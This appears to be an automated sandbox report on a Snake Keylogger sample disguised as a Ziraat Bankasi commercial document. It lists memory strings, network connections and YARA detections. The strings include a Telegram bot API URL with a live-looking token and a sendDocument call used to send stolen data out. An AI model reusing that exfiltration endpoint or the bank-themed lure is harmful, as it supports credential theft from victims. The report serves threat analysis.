Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-420
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
